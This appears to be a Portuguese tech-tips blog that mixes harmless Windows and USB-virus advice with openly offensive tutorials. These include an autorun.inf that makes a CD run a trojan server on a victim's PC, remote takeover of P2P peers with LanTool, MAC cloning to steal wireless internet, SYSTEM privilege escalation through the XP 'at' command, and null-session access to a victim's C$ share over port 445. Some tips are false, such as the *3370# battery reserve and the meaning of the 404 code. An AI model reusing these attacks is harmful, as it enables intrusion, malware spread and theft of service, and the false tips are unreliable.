Invasão no Windows 8 através do Java Signed Applet

Este vulnerabilidade permite ao invasor obter qualquer dado de um computador como Windows 8, pois através de engenharia social como induzir os usuários.

Detecção de Intrusos com SNORT - Back|Track 5R3

Sistema de detecção de intrusão , nada mais é do que uma ferramenta capaz de identificar tentativas de invasão em tempo real.

Hackeando e obtendo informações de dispositivos Android

Uma técnica de "hackear" os dispositivos moveis com o sistema operacional Android. Vamos utilizar a ferramente já conhecida por alguns, o Metasploit.

terça-feira, 28 de dezembro de 2010

Não consigo utilizar o gpedit.msc ou Internet Explorer, problemas com o controle ActiveX. O que fazer? – Dica Rápida!


Pessoal este problema vem se tornando comum nos computadores principalmente com Windows XP, mas nada impede de ocorrer com outros Sistemas Operacionais da família Windows©.
O problema ocorre por causa de um bug na nova versão do Flash Player©. É o que dizem os técnicos em informática. Caso a mensagem indique que não é possível executar o ActiveX ou coisa parecida, o problema é muito fácil de se resolver.
No Windows XP, clique em INICIAR – EXECUTAR – DIGITE REGEDIT
Agora siga este caminho:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones

Ao chegar à pasta Zones, você encontrará uma subpasta cujo nome é um símbolo gráfico, normalmente um quadradinho (ficando acima do número 0). Basta apagar esta pasta, logo que pressionar Delete aparecerá uma mensagem perguntando de deseja realmente apagar a pasta e suas configurações, clique em sim. Pronto agora você poderá voltar a usar normalmente o Internet Explorer e o gpedit.msc.

domingo, 26 de dezembro de 2010

3 Utilidades escondidas no seu celular

CONHEÇA AS TRÊS UTILIDADES QUE ESTÃO ESCONDIDAS EM SEU CELULAR.
03 coisas que você nunca soube sobre seu celular.
Será útil manter essas informações com você.
Existem algumas coisas que podem ser feitas em caso de emergência.
Seu celular é uma ferramenta que pode salvar sua vida.
Veja o que ele pode fazer por você:

.
.
Emergência I
O número universal de emergência para celular é 112
Se você estiver fora da área de cobertura de sua operadora e tiver alguma emergência, disque 112 e o celular irá procurar conexão com qualquer operadora possível para enviar o número de emergência para você, e o mais interessante é que o número 112 pode ser digitado mesmo se o teclado estiver travado. Experimente!
.
.
Emergência II *3370#
Vamos imaginar que a bateria do seu celular esteja fraca. Para ativar, pressione as teclas: *3370#
Seu celular irá acionar a reserva e você terá de volta 50% de sua bateria. Essa reserva será recarregada na próxima vez que você carregar a bateria.
.
Emergência III *#06#
Para conhecer o número de série do seu celular, pressione os seguintes dígitos: *#06#
Um código de 15 dígitos aparecerá. Este número é único. Anote e guarde em algum lugar seguro. Se seu celular for roubado, ligue para sua operadora e dê esse código. Assim eles conseguirão bloquear seu celular e o ladrão não conseguirá usá-lo de forma alguma. Talvez você fique sem o seu celular, mas pelo menos saberá que ninguém mais poderá usá-lo. Se todos fizerem isso, não haverá mais roubos de celular.

sábado, 25 de dezembro de 2010

Ponto De Restauração

Primeiramente oque è um ponto de restauração ?

Vou dar uma explicação bem complexa, imagine se você pudesse voltar segundos atrás para desfazer uma besteira, seria excelente não ?, bom pelo menos no computador você pode fazer isso, isso se chama ponto de restauração , agora vamos aprender como usa lo


Criando um ponto de restauração no Windows XP


1. Clique no menu Iniciar, depois em Todos os programas > Acessórios > Ferramentas do sistema > Restauração do sistema



2. Ira abrir um assistente nele marque a opção Criar um ponto de restauração e clique em Avançar.



3. Na proxima tela, você apenas precisa determinar uma breve descrição para este ponto de restauração. Clique em “Avançar” para continuar.



4. A ultima tela e so de confirmação. Em vermelho, aparecem as informações sobre o ponto de restauração recém-criado. Basta clicar em Fechar e seu sistema estará pronto para ser restaurado quando você quiser.



Restaurando o sistema


Se você criou um ponto de restauração, teve problemas com algum aplicativo e deseja reverter a situação, basta seguir estes passos:

1. Clique no menu Iniciar, depois em Todos os programas > Acessórios > Ferramentas do sistema > Restauração do sistema



2. Marque a opção “Restaurar o computador mais cedo” e clique em “Avançar”



3. Na tela exibida, você verá um calendário. Nele estão marcados todos os dias que têm restaurações de sistema disponíveis. Lembre-se que o Windows cria pontos de restauração automaticamente. Além disso, instalações de programas também criam pontos de restauração. Por isso que há várias opções nesta hora. Você pode ir diretamente para a data da criação do seu ponto de restauração manual, utilizar a restauração mais recente ou utilizar uma anterior a uma instalação que não deu certo.



4. Clique em “Avançar” para continuar.



A próxima tela exibe o ponto de restauração selecionado e lhe informa sobre alguns detalhes que você deve saber:

a) Você não perderá documentos ou mensagens de email.

b) Este processo é reversível.

c) Durante a restauração, seu computador será desligado. Logo, você deverá fechar todos os programas em execução e salvar seus trabalhos.

d) A restauração do sistema não substitui o processo de desinstalação de um programa. Para isso, você deve utilizar o recurso “Adicionar/Remover Programas” no Painel de Controle ou o próprio desinstalador do software.

5. Pronto. Ao reiniciar o computador, você será informado sobre a restauração. Caso nenhuma alteração tenha sido encontrada, nada será feito. Caso contrário, você será informado sobre o quê foi modificado e poderá usar seu computador normalmente.

Se você é usuário dos sistemas Vista ou 7, confira os links abaixo e proteja o seu computador de diversos imprevistos!



By: Mateus

terça-feira, 21 de dezembro de 2010

Invadindo PCs em rede P2P

Invadir pc pelo ares,Emule ...
(TUTORIAL) Invadindo pc pelo Ares Msn Emule e chat
(TUTORIAL) Invadindo pc pelo Ares Msn Emule batepapo
Sabe quendo vc baixa algo no ares emule envia fotos no msn ?
Isso gerauma rede de conexão chamada TCP

Vamos usar um programa chamado LanTool, ele serve para conexão remota de redes mas com sua rede TCP ele serve para invadir.

Baixe o Programa que irmos usar
DOWNLOAD do LanTool.

Obs: O eMule é mais facil de invadir. Porque Antes de iniciar ele mostrará o IP da vitima.

Baixa e instale o Lantool
Abra o eMULE inicie um download e tambem um chat com um usuario
Abra o LanTool E repare que bem noi inicio da tela tem uma aba verde (azul...)
Escrito umas coisas assim (Server ,System)
Vá com o botão direito em cima dessa aba e selecione
INFO --Baixa e instale o Lantool
Abra o eMULE inicie um download e tbm um chat com um usuario
Abra o LanTool E repare que bem noi inicio da tela te,m uma aba verde (azul...)
Escriot umas coisas assim (Server ,System)
Vá com o botão direito emcima dessa aba e selheciona
Info >> Active conections
Vai aparecer uma lista de gente conectada através de vc na rede TCP (chat do emule,enviando no msn...)
Vc vai com o botão direto no ip conectada lá no lantool e pronto
ACTIVE ---> CONECTION
Vai aparecer uma lista de gente conectada através de vc na rede TCP (chat do emule,enviando no msn...)
Clique com o botão direto no IP conectada lá no lantool e PRONTO!

Com o botão direito noIP você pode
 - Dar shutdown
 - Eviar mewnsagens
 - E emcima da tela no programa vc pode
 - Escolher qualquer opção....
 - Executar deltree no pc dele
 - Enviar arquivos e
ETC... 


Hc Host
No Caminho Certo do Conhecimento

sexta-feira, 17 de dezembro de 2010

Infectando por CD

Material:
-1 CD virgem
-1 Servidor de Trojan
-1 Bloco de notas

Simples né?

1ºCrie um bloco de notas, e nele coloque assim:

[AutoRun]
open=nome_do_seu_server.exe
icon=nome_do_seu_server.exe,0


2º Agora, salve com o nome de: AUTORUN.INF

3ºGrave os arquivos em um cd

4º Pronto! Quando a vitima colocar o CD no pc, ela irá se infectar, isso porque esse é um comando muito usado para execução automatica de jogos e programas, mas sem uma previa verificação do arquivo fica facil trocar esse "jogo" por um servidor!

Clonando Redes Wireless

Devido ao grande crescimento desse tipo de redes pelo Brasil, e a grande falta de dinheiro no bolso do povo pra pagar conexão de internet, resolvi disponibilizar algumas informações que pode vir a dar acesso gratuido de internet.

para isso vc vai precisar de:

um cartão Wireless:
http://www.emstech.com.br/images/PCI-G361.jpg

um pigtail:
http://www.sat5.com.br/imagens/produtos/a000339.jpg

Cabo,
http://www.cndigital.com.br/images/produtos145/TEW-8000F.jpg

e uma antena wireless:
http://www.hotelthermas.com.br/IMAGES/Midia/WIRELESS.jpg

http://centros5.pntic.mec.es/desanton/wq/hunt02/pringles02.jpg


uma vez o aparato montado, baixe o programa AMAC

http://br.geocities.com/mariagasolinas2/amac.zip

Obs.: É importante lembrar que tem rede que nem é preciso clonar o MAC Adress para invadir, isso vai depender do tipo de AP que ela usa, é importante que também existem redes que pedem altenticação extra atravéz de um programa chamado BRMA, caso a rede possua esse tipo de altenticação, ai só conseguindo uma senha,,,,, porém vamos trabalhar com a ipótese de que esse programa não é utilizado pelo provedor, o que é mais comum:

descompacte o AMAC, vc notará que ele tras uma versão portável e uma instalavel, e junto vem o serial que ser ve para ambas as versões, grave os em um CD,,,, agora entra a engenhadria social,,, vc vai até a casa de um amigo seu que tenha acesso ao provedor de sua escolha,

Obs.: vc tera que ter acesso a um micro que esteja conectado direto com o provedor wireless
uma vez com acesso vc insere o Cd no driver do micro de seu amigo e executa a versão portável do programa, clica em Register, coloca o serial e clica em ok, ele vai agradecer pelo registro e bla bla bla, bla bla bla,,,

visualize dois campos na parte inferior do programa entitulados From e TO.

http://amac.paqtool.com/images/amac.jpg

neles vc coloca a faixa de ip em que vc quer scanear os mac adresses

clique em scan,,,
dependendo da velocidade em que esteja a conexão vc pode puxar o controle deslizante dele para aumentar a velocidade do scan.

ao concluir, copie os ips e macs para o bloco de notas, fexe o programa e vá pra casa, agora use a parte instalável, instale no seu micro, registre da mesma frma que fez com o outro, agora vc notará a presença de um botão novo chamado "Quick MAC Change", clique nele, ele abrirá uma caixa de dialogo,,, copie um dos macs que está anotado no arquivo do bloco de notas e cole no campo MAC, clique em CHANGE MAC, de ok, clique em exit, confirme, e saia do programa, agora clique com o botão direito em Meus Locais de rede, e clique em propriedades, clique com o botão direito do mouse na conexão de rede sem fio e clique em propriedades, seleciode: protocolo TCP/IP e clique em propriedades: de sua escolha, a conexão tem que ser feita por um cartão wireless, um AP router não vale, pois não daria para executar o próximo passo:
coloque o endereço de IP correspondente ao MAC que vc colocou lá no AMAC, coloque a mascara de subrede*, o gateway* o DNS** lcique em ok
depois em fechar, agora vá no software de configuração da placa, escolha o a rede alvo e adicione ao perfil, adicione a chave WEP* caso seja necessário, e clique em conectar,,,,, VOILÀ!!!!!! temos NET, se vc tiver feito tudo correto, sua conexão deverá estar funcionando normalmente.

Obs.: quando o verdadeiro dono da conexão entrar online, sua velocidade vai diminuir, ou até mesmo cair, a mesma coisa acontece se ele estiver usando a net e vc entrar, por isso use com moderação, e sempre mantenha uma boa lista de MSCs, para ir revesando, pq senão pode da na vista*

bom gente, por hoje é só: caso tenham qualquer dúvida é só postar ai que eu respondo namedida do possível.


* pressuponho que vc ja tenha pesquisado essas informações
** caso não saiba o DNS, coloque 4.2.2.2, é o DNS público da Embratel.

Identifique o nome de uma fonte com apenas uma imagem dela

Encontre  qualquer fonte a partir da imegem !
Simplesmente tire um Print Screen, faça o UpLoad e o site identificará a fonte!

O nome do site  é: My Fonts (http://new.myfonts.com/WhatTheFont/)

 O serviço é bem simples e rápido. Primeiro, Salve a imagem onde está a fonte (arquivo com no máximo 2mb). Após, na seção Upload a File no site, clique em Browse. Localize a imagem e abra. Você também pode optar por copiar a URL da imagem e colar em Specify a URL. Clique em Continue.


Na página que abrirá identifique letra por letra. O site automaticamente já identifica algumas letras. Vá em Continue. Logo após, o site mostra fontes que são parecidas com a fonte da imagem. O serviço de download pelo próprio site é pago, então copie o nome da fonte que você mais gostou e jogue no Google, opções de download não faltarão.

domingo, 12 de dezembro de 2010

Vire administrador no Windows

Fora identificado uma vulnerabilidade no windows xp, onde é possível escalar privilégios de administrador, sem cds de boot ou modo de segurança default, a falha encontra-se no comando at junto ao cmd do windows xp, cujo o mesmo tem nível um administrativo.

O que é AT?

AT é um agendador de tarefas, no qual você pode agendar uma tarefa para execução de uma função ou arquivo.

Como é explorado essa falha?

Procedimentos seguites são:

Iniciar>Executar>cmd.exe


Se apareceu "Acesso Negado" tente Command.com no lugar de cmd.exe, caso ainda esteja acesso negado, vc está sem sorte, procure outro meio de escalar privilégios, ou por conta convite. bom caso tenha dado certo, faça como adiante:

at hora /interactive "cmd.exe"


Onde AT é o agendador, hora seria a hora que o agendador irá executar o processo solicitado, /interactive permite que o trabalho interaja com a area de trabalho do usuário que estiver conectado quando o trabalho estiver sendo executado.

no lugar de hora, coloque as horas reais, por exemplo, agora são 07:05 então faça at 07:06 /interactive "cmd.exe"

quando for 07:06 o aparecerá um novo prompt de comando, ou seja o cmd.exe como administrador está sendo executado.


De Ctrl + alt + del , va em processos, finalizar explorer.exe, e dentro do prompt de comando aberto o novo cmd, execute explorer.exe, espere até ele reiniciar só o explorer, quando abrir vá em Iniciar e la em cima onde fica o nome do usuário estará escrito SYSTEM, pronto está em Modo Administrador, agora, vc pode fazer o que quiser com o sistema, des de criar, apagar contas etcs.  

Invadindo o Windows

Neste tutorial vamos aprender a invadir o windows pela porta 445.

Mais sobre a porta 445
- A porta TCP 445 é do SMB (Server Message Block), que serve para compartilhamento de arquivos. A partir do Windows 2000, a Microsoft trocou as famosas TCP 139 e UDP 137-138, fazendo o SMB trafegar direto em cima do TCP/IP, pela 445. Ou seja, na sua rede interna, é um mal necessário. Já no firewall, na saída para Internet, deve ser fechada sempre, tanto inbound quanto outbound.

Como saber se a porta 445 está aberta
Muito simples digite netstat -an na cmd e aparecerá suas conexões ativas.

Programas utilizados
- Dump users:
http://unknow-ro0t.freeweb7.com/Dump_users.rar
Depois de baixar o dumpusers extraia ele para a pasta windows.


- Zenmap.org

http://www.superdownloads.com.br/download/109/nmap/
Agora que você baixou o nmap scaneie o IP da vítima e veja se a tal porta 445 está aberta.


Como efetura a invasão

Vamos dizer que (xxx.xxx.xxx.xxx) é o IP da vítima,para saber se este IP é do brasil basta que você olhe os números iniciais que são chamados ranges, que são utilizados para definir de onde é um certo indereço de IP.

1. Vá até a prompt de comando e didigte:
net use \\xxx.xxx.xxx.xxx\ipc$ "" /u:""

2. Abra outra CMD e digite:
dumpusers -target xxx.xxx.xxx.xxx -type notdc -start 1 -stop 900 -mode verbose

3. Abra o executar e digte:

iniciar>executar>\\xxx.xxx.xxx.xxx\c$

Pronto,agora o disco local da vítima está shared com você.

sábado, 20 de novembro de 2010

Vírus que transforma pastas em atalhos – SOLUÇÃO


Galera, já vi muitas pessoas com este problema, o vírus oculta a pasta e cria um atalho, que por ventura não abre a pasta, deixando os usuários preocupados, pois acreditam que suas pastas foram apagadas com tudo dentro.
Não se preocupe! Seus arquivos não foram deletados! Para Resolver o problema vou criei uma solução simples que resolve mesmo o problema. Vamos lá:
  • Primeiramente vamos abrir o Bloco de notas ou no inglês Note Page.
  • Com ele aberto, vamos copiar o código abaixo:

@echo off
\
dir *.
attrib -R -S -H /S /D *.*

Bom, vamos à explicação de cada linha do código:

  • O @echo off apaga qualquer coisa que esteja na área de transferência do Windows, ou seja, quando copiamos ou recortamos algum arquivo, ele vai para esta aera. Este comando evita que haja erro na hora da execução, não é muito necessário colocá-lo, mas eu costumo usá-lo.
  • O \ diz que os próximos códigos serão executados na raiz de onde este arquivo está salvo.
  • O dir *. lista todas as pastas que estão na raiz de onde o arquivo foi executado, se as pastas não aparecerem, é porque estão ocultas.
  • O attrib -R -S -H /S /D *.* faz com que todos os arquivos da raiz onde ele foi executado e estão ocultos, voltem a aparecer normalmente.

Já entendido, é hora de salvarmos! Para isso escolha o local onde vai salvar, ou seja, no pen drive! Para salvar, quando escolher o nome do arquivo, coloque no final .bat exemplo, desoculta.bat.
Pronto! Se você fez tudo certo até aqui, seu “desocultador” de pastas já está pronto. Lembre-se para que ele funcione, ele tem que estar salvo no pen drive, basta clicar duas vezes nele e ele fará o resto.
Caso queria copiar para um colega ou professor (sei lá), basta copiá-lo para o outro disco removível. Ele funciona em qualquer disco removível, como pen drivers, celulares, câmeras digitais e tals.
Os atalahos, aquelas pastinhas com uma setinha branca, podem ser deletados sem problema algum.
Espero ter ajudado. By Guilherme.


ATENÇÃO, nova solução mais eficiente, clique aqui.

sábado, 30 de outubro de 2010

40 Dicas para melhorar seu site

Aproveitem galera!

Não Contem SENHA!

sexta-feira, 29 de outubro de 2010

Salvando em PDF no Microsoft Word 2007 - Dica Rápida!

 
E ai galera! Mais uma vez aqui o admin Guilherme. Bom neste tutorial quero explicar para vocês como salvar seus textos do Word em pdf. Todo mundo sabe que o PDF é um arquivo um pouco mais seguro, livre de ser editado, ou seja, não se pode modificá-lo, antigamente nem podia copiar o texto e as imagens, mas os Adobe Readers mais novos são capazes de copiar. Por um lado ajudou quem precisava copiar o conteúdo, facilitando a vida, pois não é necessário copiar letra por letra e tirar print para copiar a imagem, mas por outro diminuiu a segurança do arquivo.
Mesmo assim galera é interessante colocar arquivos ma internet salvos em PDF, pois assegura que ninguém mudará nada no arquivo, a não ser que a idéia seja que a pessoa modifique. 
Sem mais delongas, vamos à parte central deste tutorial. Primeiramente você deve instalar uma extensão para que o Word seja capaz de salvar em PDF. Clique aqui para baixá-lo.
Depois de baixado e instalado, abra seu arquivo do Word, em salvar escolha "salvar como..." e clique na opção salvar como XPS ou PDF, quando abrir a janela para escolher o destino do arquivo, escolha o local e digite o nome com o final ".pdf" sem aspas. Pronto! Seu arquivo foi salvo em PDF, obrigado pela preferência e volte sempre!

quinta-feira, 28 de outubro de 2010

Dusando Linux para deletar vírus do pen drive! - Dica Rápida

Salve novamente galerinha, aqui quem fala é o administrador Guilherme! Hoje vou deixar uma dica bem interessante para quem quer se livrar dos vírus de pen drive e os enjoados autorun.inf's, se você abrir seu pen drive num computador onde o sistema operacional seja Linux©, você conseguirá deletar todas as pragas, pois elas não funcionam nesse sistema, somente em Windows©. Caso você queira saber mais sobre os vírus que infectam seu pen drive, clique aqui. Ou aqui.

sexta-feira, 22 de outubro de 2010

Mini Curso Anti-Hacker

Esse mini curso alem de ser uma defesa ant-hacker pode ser tambem um ataque com base no conhecimento da defesa!. By : ADM HCHost


Não contem SENHA!



sábado, 9 de outubro de 2010

Como criar temas ou skins para Windows Live Messenger ( MSN )

Bom, ai vai um programinha e um super tutorial explicando como criar seus própios temas ou skins para seu MSN ! E o melhor, o programa não precisa ser instalado.

  • SENHA: http://www.hc-host.net/
  • TAMANHO: 1,66 MB

sexta-feira, 8 de outubro de 2010

Aumentando o tempo ativação do Office 2010


Que tal prorrogar o tempo de teste do programa Office 2010 para pelo menos mais 6 meses (180 dias)?

Se você quiser prorrogar o tempo de uso do Microsoft Office 2010, o utilitário Trial Extender poderá fazer isso sem precisar usar nenhum crack do Office 2010 ou serial do Office 2010. Nem mesmo precisará digitar nenhuma linha de código.

Basta baixar o programa e executar o utilitário, clicando no botão "Rearm" para que o tempo de uso se amplie.

Como muitos produtos da Microsoft tem uma função oculta para ampliar o tempo de uso dos softwares sem que a maioria dos usuários saiba, o utilitário Trial Extender apenas lhe dá uma “mãozinha” sem precisar baixar nada ilegal.

Você deverá fazer isso antes da expiração do Office 2010 e poderá executar num total de até 5 vezes, dando lhe 180 dias de uso para todos os recursos do Microsoft Office 2010.


DOWNLOAD






Erro 404 o que significa ?

Pessaol, este erro é mais comum do que se imagina. E hoje tenho o prazer de explicá-los porquê ele aparece.
Para começar temos que saber o que é um link:
A definição de link é bem simples:
-> Link é um caminho (HTTP), que te leva até um determinado arquivo.
1.1 Exemplo:
Vamos supor que no meu site haja uma pasta com o nome link. Para acessar esta pasta eu devo digitar o endereço que no caso é www.hc-host.net mais uma barra (/) que significa a passagem para outra pasta, mais o nome da pasta ficando assim:

www.hc-host.net/link

Assim ou vou consegui acessar a pasta do meu site, e para acessar arquivos basta acrescentar depois da pasta onde o arquivo esta outro barra e seguido do seu nome com sua extenção.
1.2 Exemplo:
tenho um arquivo dentro desta pasta chamado de trabalho.doc,então o link será assim:

www.hc-host.net/link/trabalho.doc

Quando eu acessar este link o navegador (no meu caso Firefox) vai pedir para fazer download do arquivo.
Bom como você pode perceber, ele foi o caminho para que eu pudesse chegar ao arquivo trabalho.doc.
Link nada mais é do que isto, há links grandes e pequenos mas quase todos tem a mesma finalidade.
Bom agora imagine que você ao tentar acessar o arquivo trabalho.doc, receba uma mensagem mais ou menos assim:


not found!
404 error

Isso significado que o arquivo que você está tentando acessar (no caso trabalho.doc) não foi encontrado pela caminho que você forneceu.
Três coisas podem ter acontecido:

Uma, o arquivo foi deletado.
Duas, o arquivo foi renomeado.
Três, você digitou o caminho errado.

Obs: Naturalmente, você está curioso para saber o que significam esses números. Vamos lá. O primeiro quatro indica dois problemas: ou o endereço do site está truncado ou ele não existe mais. O zero sinaliza para um erro de ortografia. O último quatro aponta para uma anomalia específica chamada "Acesso não autorizado", isto é, você só entra na página que exibe esse alerta se tiver uma senha.

quarta-feira, 6 de outubro de 2010

Esclarecendo dúvidas sobre vírus em pen drive

Bom galera, olá novamente! Vamos a mais esclarecimentos sobre pragas no pen drive que normalmente atormentam a vida de muitas pessoas.

 

Eu costumo ajudar muito a galera com pen drives infestados destas pragas virtuais, mas o que eu mais reparo é a falta de conhecimento sobre estas pequenas aplicações que porventura na maioria das vezes o único problema que eles causam é ocupar espaço no HD e no pen drive.

 

Os usuários mais leigos costumam atribuir ao vírus a causa do computador andar lento, algum erro que apareceu ou até mesmo pelo plano de fundo ter mudado sozinho!

 

Lembre-se, caso seu computador ande lento, a vários fatores que podem estar relacionados, o vírus pode sim contribuir, mas ele só vai agir se você não usar um antivírus que esteja sempre atualizado. Importante frisar a palavra atualizado, pois não adianta você ter um antivírus instalado e ele não manter suas vacinas sempre em dia. Para isso você deve estar conectado à internet.

 

Bom, o mais comum de se encontrar em pen drives são os pequenos arquivos chamados de autorun.inf, ele somente nada faz, mas ele serve de configuração para que quando você conecte seu pen drive na porta USB, automaticamente o Windows execute o vírus.

 

Vamos a alguns exemplos de pastas que costumam aparecer sozinhas nos pen drives:

 

NADFOLDER – Nela se esconde configurações do vírus ou até mesmo ele, normalmente ela aparece como se fosse à lixeira.

 

RECYCLER – Esta pasta também pode aparecer com o ícone de uma lixeira, mas às vezes aparece como uma pastinha normal.

 

Há outras pastas que podem aparecer com nomes estranhos em seus pen drives, caso isso aconteça, apagá-la somente não adianta, pois os autoruns ajudam para que estes arquivos sejam copiados para seu HD, caso você não possua um antivírus, denominando-os assim de autoinfects.

 

Como teste, limpe seu pen drive no seu computador ou aquele que você frequentemente use, depois de limpo, desconecte-o e conecte novamente nesta mesma máquina. Depois de um minuto você volta a retirá-lo e leve ele até uma máquina que você tenha certeza que haja instalado um bom antivírus, quando você conectar aparecer uma mensagem do antivírus acusando vírus, você pode ter certeza que sua máquina esta infectada, ou seja, toda vez que você limpar seu pen drive e conectá-lo ao seu computador o vírus será novamente copiado ao pen drive.

 

A dica é procurar programas e antivírus que realmente te ajudem a desinfetar sua máquina.

 

Um medo comum que usuários leigos têm, é de ficarem assustados quando ao conectarem o dispositivo móvel, o antivírus acuse, muitas vezes escandalosamente uma praga encontrada.

Bom se o seu antivírus acusou, isso diz que ele está funcionando não é? Então não há problema algum conectar seu pen drive infectado com um bom antivírus instalado e devidamente atualizado.

 

Outro problema são aquelas pragas quem transformam suas pastas em arquivos executáveis. Ou seja, sua pasta aparece com mesmo nome mais terminado com .exe .

Exemplo:

No meu pen drive há uma pasta com nome de hchost. Quando meu pen drive fica infectado com este vírus a pasta aparece com este nome: hchost.exe

Na verdade não é sua pasta que aparece com aquele nome e sim um arquivo executável, na qual é criado pelo vírus e recebe o mesmo nome que sua pasta. E o vírus não apagou sua pasta, normalmente ela está oculta. Para saber como desocultar sua pasta, faça uma breve busca no Google de "como mostrar pastas e arquivos ocultos".

 

E outra medida que você deve tomar é escanear com um bom antivírus, o seu pen drive e seu HD para certificar-se que nenhuma "parte" ficou para trás! 

 

Bom, espero que com este artigo, fique mais claro um pouco como funciona um vírus e como se livrar de uma vez por todas destas pragas virtuais. 

domingo, 3 de outubro de 2010

Colocando background diferentes para cada widget

Sim, é possível colocar cada widget de uma cor.
Para isso você tem que saber qual o "ID" de cada um dos widgets do seu blog. Para isso proceda da seguinte maneira:


Anote o título do widget que vc quer colocar de outra cor, mas tem que ser certinho, sem faltar nem um acento.

Não se esqueça de antes de começar salvar uma cópia de seu template, caso não dê certo, é só reinstalá-lo.


Agora vá até o HTML de seu blog e clique em "Expandir modelos de widgets".
Clique então na tecla F3 de seu teclado e cole na janela que vai se abrir o título do widget que você quer colocar o fundo.


Pronto, veja que no HTML ficou selecionado o título do widget. Agora veja um pouco mais a frente você verá uma inscrição a frente de "id="

No meu caso a inscrição é:

LinkList3

Copie esta inscrição, você precisará dela.



Agora procure este próximo código:

]]>

E cole o código abaixo antes dele.



#LinkList3 {
background: #DDF5DD;
border: 2px solid #000;
margin: 2px;
padding: 4px;
}


  1. Percebeu que o código na cor vermelha é o id ? Portanto, o que vc terá que fazer é substituir o código pelo código do id de seu widget.
  2. O código na cor verde é a cor de fundo do widget (você também poderá colocar imagem de fundo no lugar do código de background).
  3. O código na cor azul é a cor da borda.
Vá fazendo isso a cada widget que queira trocar de cor.

created by  templateseacessorios.blogspot.com

quarta-feira, 29 de setembro de 2010

Removendo vírus de pen drive

1º Passo – Como funcionam esses vírus?

Quando inserimos um CD ou DVD no computador ele normalmente executa algum software, ou abre algo. Isso tudo automaticamente.
Como isso acontece? Existe um arquivo chamado autorun.inf que fica na raiz do CD ou DVD que tem as instruções de abrir algum programa ou colocar o ícone no CD/DVD.

Esses vírus fazem uso desse arquivo mas ao invés de abrir algo inofencivo executam vírus que ficam instalados no computador e infectam outros pendrives, ou como disse em casos mais extremos danificam o computador.

2º Passo – Usar um bom antivírus

Existem muitos softwares hoje em dia, mas quais são eficientes é outra história.
Não há um antivírus perfeito, mas há os menos ruins.
Dentre eles, os nomes que ouço muito bem são.

-Os pagos
Kaspersky
NOD32
Panda

-Os gratuitos
Avira

Atualmente eu utilizo o Avira. É gratuito, leve, bom e não tenho muito do que reclamar.
Até hoje não deixou passar nenhum vírus de pendrive e outros para o meu PC.
Portanto recomendo ele, o link para download é

http://www.baixaki.com.br/download/avira-antivir-personal-edition-classic.htm

3º Passo – Depois do antivírus entrar em ação, restaurar o pendrive e o computador

Se você utiliza um desses antivírus acima, então ao colocar seu pendrive infectado no computador ele irá acusar um vírus e automaticamente limpará o pendrive.

Porém isso não garante que seu computador está mesmo livre do vírus.
Quando escrevi as primeiras versões desse guia eu indiquei vários programas para tirar esses vírus.
Hoje vou recomendar apenas um que irá fazer a faxina geral no computador.

4º Passo – Combofix

Primeiro faça o download do Combofix aqui

http://www.baixaki.com.br/download/combofix.htm

Depois de fazer o download execute ele, como as instruções são em português não tem segredo, só lembre de não fazer nada enquanto ele é executado.

Bom depois de executar o Combofix, tanto seu pendrive como o computador devem estar limpos.

domingo, 26 de setembro de 2010

Portable Artisteer Standard Edition v2.4.0.25435

  • Tamanho (Size) : 65,7 Mb
  • Link: Download
  • Homepage
  • Senha (Password): No password - Não há
  • Lingua (Language): Multilanguage
O layout dos sonhos não é algo impossível de ser feito – basta usar a ferramenta certa. O Artisteer possui recursos para a criação de layouts para sites e blogs dos mais variados estilos e formatos para todos os gostos, por isso é uma ferramenta muito versátil. Essa variedade também afeta as várias plataforma para as quais você pode exportar o seu layout produzido com o Artisteer. O programa possui uma interface bastante simples e que foi desenhada a partir da que está sendo usada nos programas do pacote Office 2007.

Entretanto, o programa é uma versão liberada para testes. Todas as funções deles estão liberadas, mas esta diferenciação é percebida quando o usuário exporta seu projeto finalizado e vê que a palavra “Trial” está escrita milhares de vezes em forma de marca d’água no seu layout. Para remover esta marca, você deve comprar o programa. Logo na tela de abertura quando se inicia o Artisteer você vê cinco opções: “Testar Edic. Padrão”, “Testar Edic. Caseira”, “Comprar”, “Ativar” e “Sair”. Para contar com as ferramentas mais populares, clique em “Testar Edic. Padrão”.

Quando você estiver operando na edição padrão do Artisteer, veja que aparecerá uma tela perguntando qual plataforma receberá o seu layout. As suportadas pelo programa são: WordPress (para blogs), Joomla, Drupal (ambos desenvolvedores de portais online), Página de Início da Empresa (em HTML), Aplicação ASP.NET e CodeCharge Studio (para usuários avançados que desejam elaborar conteúdos diferenciados). O tipo de veículo que você vai produzir afeta no estilo da página, mas não muito.

Os blogs possuem um diferencial quanto aos posts que são dispostos de maneira que os mais recentes sejam expostos no topo da lista. Já os sites no estilo portal possuem uma disposição diferente para comportar a hierarquia de conteúdos disponibilizados. Dessa maneira, sinta-se livre para criar seus layouts do jeito que achar melhor, afinal o Artisteer dá esta liberdade a você. Para começar a usá-lo, instale e selecione qual plataforma deseja utilizar.

Se você está sem idéia, pode pedir que o próprio Artisteer dê sugestões de como montar seu layout clicando no botão “Sugerir Desenho” logo abaixo da paleta (na mesma posição da logo do Office 2007). Ao lado, você observa que o programa ainda oferece várias outras sugestões, porém estas são específicas e direcionadas às cores, fontes, fundos, formatos de folha, disposição de layout e outras características. A segunda aba ou guia é a “Cores e Fontes”, como o nome já diz, basta selecionar um modelo de cores e fontes já prontos ou personalizar um para fazer com que o seu projeto fique do jeito que você quer.

Como você deseja que o seu layout seja único e fique com a sua cara, o posicionamento dos blocos informativos é muito importante. Cada posição pode atender melhor a um tipo de veículo. Entretanto, esta escolha é livre e cabe ao dono da página decidir. Contudo, o Artisteer oferece opções de uma, duas ou três colunas. No caso de duas ou mais colunas, elas podem estar localizadas à direita ou esquerda. Quando se trata de três colunas é possível intercalar os blocos de maneira que o bloco central (aquele que fica com os posts – no caso dos blogs) fique ladeado por outras colunas com widgets e conteúdos complementares.

O plano de fundo precisa combinar com o seu layout, afinal ele é a base de tudo. O Artisteer possui opções bastante atrativas para qualquer usuário. O programa tem uma boa biblioteca de imagens personalizáveis para plano de fundo que contém elementos gráficos, brilhos, dégradés e até mesmo a cor pura e simples. Além disso, a opção “Sugerir Fundo” pode ser sempre uma alternativa para os indecisos.

O Artisteer também oferece opções para que você escolha qual formato de página deseja. Esta aba é dedicada aos cantos – dizendo a grosso modo. O seu veículo pode ter cantos retos, arrendondados, arredondados com borda ou sombra e assim por diante. Assim como o plano de fundo, este quesito conta muito para a identidade visual do seu lugar na web. Esta aba também pode sugerir opções de folha assim como ferramentas para configuração manual deste critério.

